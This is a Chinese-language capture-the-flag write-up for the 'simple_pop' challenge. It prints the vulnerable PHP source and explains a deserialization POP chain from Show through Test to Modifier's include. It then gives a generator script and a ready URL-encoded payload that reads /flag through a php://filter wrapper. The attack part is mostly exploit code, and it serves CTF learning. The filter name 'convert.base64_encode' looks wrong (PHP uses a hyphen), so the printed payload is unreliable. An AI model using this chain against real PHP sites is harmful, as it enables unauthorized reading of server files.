BMZCTF simple_pop

simple_pop

打开题目得到源码

这边是php伪协议的考点，需要去读取useless.php

解码获得源码

<?php  
class Modifier {
    protected  $var;
    public function append($value){
        include($value);//flag.php
    }
    public function __invoke(){
        $this->append($this->var);
    }
}
 
class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."
";
    }
    public function __toString(){
        return $this->str->source;
    }
 
    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}
 
class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }
 
    public function __get($key){
        $function = $this->p;
        return $function();
    }
}
 
if(isset($_GET['password'])){
    @unserialize($_GET['password']);
}
else{
    $a=new Show;
}
?>  

这个pop链是通过show类的toString去触发test类的get最后调用Modifier invoke去得到flag

<?php
    class Modifier
    {
        protected  $var = 'php://filter/convert.base64_encode/resource=/flag';
    }
    class Show
    {
        public $source;
        public $str;
    }
    class Test
    {
        public $p;
    }

    $m = new Modifier();
    $s = new Show();
    $t = new Test();

    $s -> source = $s;
    $s -> str = $t;
    $t -> p = $m;
    echo urlencode(serialize($s));

构造payload

?password=O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Br%3A1%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A49%3A%22php%3A%2F%2Ffilter%2Fconvert.base64_encode%2Fresource%3D%2Fflag%22%3B%7D%7D%7D

解码即可获得flag